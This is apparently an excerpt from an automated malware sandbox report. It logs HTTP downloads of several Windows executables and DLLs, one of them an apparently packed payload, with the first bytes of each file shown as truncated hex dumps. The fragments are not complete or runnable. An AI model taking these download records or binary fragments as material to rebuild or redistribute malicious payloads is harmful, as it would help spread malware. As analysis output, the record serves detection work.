                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 13:20:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 13:20:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 13:20:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:20:51 GMTContent-Type: application/octet-streamContent-Length: 1988608Last-Modified: Thu, 19 Dec 2024 11:46:25 GMTConnection: keep-aliveETag: "67640791-1e5800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 d0 4b 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 7d 5c 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 e0 07 00 6a 00 00 00 00 c0 07 00 6c 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 e1 07 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 07 00 00 10 00 00 00 3c 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 6c 16 00 00 00 c0 07 00 00 08 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 07 00 00 02 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 f0 07 00 00 02 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 78 77 63 6f 75 66 71 00 e0 19 00 00 e0 31 00 00 da 19 00 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6e 73 70 73 74 67 61 00 10 00 00 00 c0 4b 00 00 04 00 00 00 32 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 13:20:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 13:20:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:21:00 GMTContent-Type: application/octet-streamContent-Length: 21504Last-Modified: Wed, 18 Dec 2024 18:13:28 GMTConnection: keep-aliveETag: "676310c8-5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 70 6d 3b c0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4a 00 00 00 08 00 00 00 00 00 00 3a 69 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e6 68 00 00 4f 00 00 00 00 80 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 54 68 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 49 00 00 00 20 00 00 00 4a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 80 00 00 00 06 00 00 00 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 69 00 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 36 00 00 70 31 00 00 03 00 02 00 1b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 38 00 00 00 01 00 00 11 73 32 00 00 06 0a 06 28 16 00 00 0a 7d 3c 00 00 04 06 02 7d 3d 00 00 04 06 15 7d 3b 00 00 04 06 7c 3c 00 00 04 12 00 28 01 00 00 2b 06 7c 3c 00 00 04 28 18 00 00 0a 2a 13 30 02 00 50 00 00 00 02 00 00 11 00 7e 02 00 00 04 16 fe 01 0a 06 2c 42 00 72 01 00 00 70 28 19 00 00 0a 00 72 63 00 00 70 28 19 00 00 0a 00 28 05 00 00 06 0b 72 a9 00 00 70 07 28 1a 00 00 0a 28 19 00 00 0a 00 07 28 04 00 00 06 6f 1b 00 00 0a 00 16 28 1c 00 00 0a 00 00 2a 13 30 02 00 38 00 00 00 03 00 00 11 73 2c 00 00 06 0a 06 28 16 00 00 0a 7d 15 00 00 04 06 02 7d 16 00 00 04 06 15 7d 14 00 00 04 06 7c 15 00 00 04 12 00 28 02 00 00 2b 06 7c 15 00 00 04 28 18 00 00 0a 2a 13 30 05 00 48 00 00 00 04 00 00 11 00 73 1d 00 00 0a 0a 1a 8d 2f 00 00 01 0b 16 0c 2b 1c 00 07 08 7e 03 00 00 04 06 7e 03 00 00 04 8e 69 6f 1e 00 00 0a 9a a2 00 08 17 58 0c 08 1a fe 04 0d 09 2d dc 72 cf 00 00 70 07 28 1f 00 00 0a 13 04 2b 00 11 04 2a 13 30 02 00 16
